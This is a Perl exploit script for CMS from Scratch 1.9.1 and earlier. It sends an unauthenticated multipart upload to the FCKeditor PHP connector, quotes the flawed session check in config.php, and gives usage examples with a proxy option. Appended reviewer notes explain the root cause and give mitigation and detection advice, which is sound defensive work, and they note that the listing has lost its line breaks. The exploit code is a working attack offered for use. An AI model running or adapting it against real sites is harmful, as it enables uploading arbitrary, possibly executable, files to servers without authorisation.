#!/usr/bin/perl # ---------------------------------------------------------------- # CMS from Scratch <= 1.9.1 (fckeditor) Remote File Upload Exploit # by yeat - staker[at]hotmail[dot]it # http://scratchwebdesignforums.com/forums/index.php?showtopic=629 # ---------------------------------------------------------------- # (fckeditor/editor/filemanager/connectors/php/config.php) # 25. global $Config ; # 26. # 27. $Config['Enabled'] = (isset($_SESSION['loginStatus']) || # $_SESSION == NULL) ? true : false ; # ... # 39. $Config['UserFilesAbsolutePath'] = # realpath($_SERVER['DOCUMENT_ROOT']); # ---------------------------------------------------------------- use Getopt::Std; use LWP::UserAgent; getopts('p:',\my %opts); my $http = new LWP::UserAgent; my ($host,$file) = @ARGV; Main::RunExploit(); # Main Package package Main; sub Usage { return print <<EOF; +------------------------------------------------------------------+ | CMS from Scratch <= 1.9.1 (fckeditor) Remote File Upload Exploit | +------------------------------------------------------------------+ by yeat - staker[at]hotmail[dot]it Usage: perl xpl.pl host/path file [OPTIONS] host: target host and cms path file: file to upload Options: -p [specify a proxy] [server]:[port] Example: perl xpl.pl localhost/cms yeat.jpg perl xpl.pl localhost/cms yeat.jpg -p 213.151.89.109:80 EOF } sub RunExploit { if (defined $opts{p}) { HTTP::Proxy($opts{p}); } if (@ARGV < 2 || @ARGV > 4) { Main::Usage(); } else { FileUpload::Exploit($file); } } # File Upload Package package FileUpload; sub Exploit { my $file = shift; my $path = "/fckeditor/editor/filemanager/connectors/php/upload.php?Type=File"; my $data = { NewFile => [$file,$file] }; my $send = $http->post('http://'.$host.$path, $data, Content_Type => 'multipart/form-data', ); if ($send->is_success) { print $send->content; exit; } else { print "Exploit Failed!\n"; exit; } } # HTTP Package package HTTP; sub Cookies { return $http->default_header('Cookie' => $_[0]); } sub 
UserAgent { return $http->agent($_[0]); } sub GET { if ($_[0] !~ m{^http://(.+?)$}i) { return $http->get('http://'.$_[0]); } else { return $http->get($_[0]); } } sub http_header { return $http->default_header($_[0]); } sub Proxy { return $http->proxy('http', 'http://'.$_[0]); }
# ----------------------------------------------------------------
# Reviewer notes (defensive reading of the listing above)
#
# Layout: this copy has lost its line breaks. As shown, everything
# after the shebang on the first physical line is a single comment to
# perl, and the original line layout of the heredoc banner in
# Main::Usage cannot be restored with certainty, so the code is left
# exactly as published.
#
# What the script does: Main::RunExploit sets an optional HTTP proxy
# (-p) and, when the argument count check passes, calls
# FileUpload::Exploit. That sub sends one multipart/form-data POST
# with a NewFile field to the FCKeditor PHP connector's upload.php
# (Type=File) under the given host/path, then prints the response
# body on success or "Exploit Failed!" otherwise. No cookie or session
# is sent: HTTP::Cookies, HTTP::UserAgent, HTTP::GET and
# HTTP::http_header are defined but never called in this listing.
# $http, $host, $file and %opts are file-scoped lexicals shared by all
# three packages.
#
# Root cause, per the config.php lines quoted in the header:
# $Config['Enabled'] is true when $_SESSION['loginStatus'] is set OR
# when $_SESSION == NULL. The second alternative holds when no session
# data exists (PHP's loose == also treats an empty array as equal to
# NULL), so a request without any login is accepted by the connector.
# $Config['UserFilesAbsolutePath'] is the document root, so accepted
# files presumably land in a web-served location (confirm against the
# connector's upload path handling).
#
# Mitigation: enable the connector only for an authenticated session
# (drop the `$_SESSION == NULL` alternative and make sure the session
# is started before the check), keep uploads outside the document root
# or in a directory where the server will not execute scripts, and
# restrict accepted file types in the connector configuration. If the
# file manager is not needed, remove or block the connectors/ path.
#
# Detection: review web-server logs for POST requests to
# .../filemanager/connectors/php/upload.php that carry no
# authenticated session, and check the upload location for files that
# site editors did not create.
# ----------------------------------------------------------------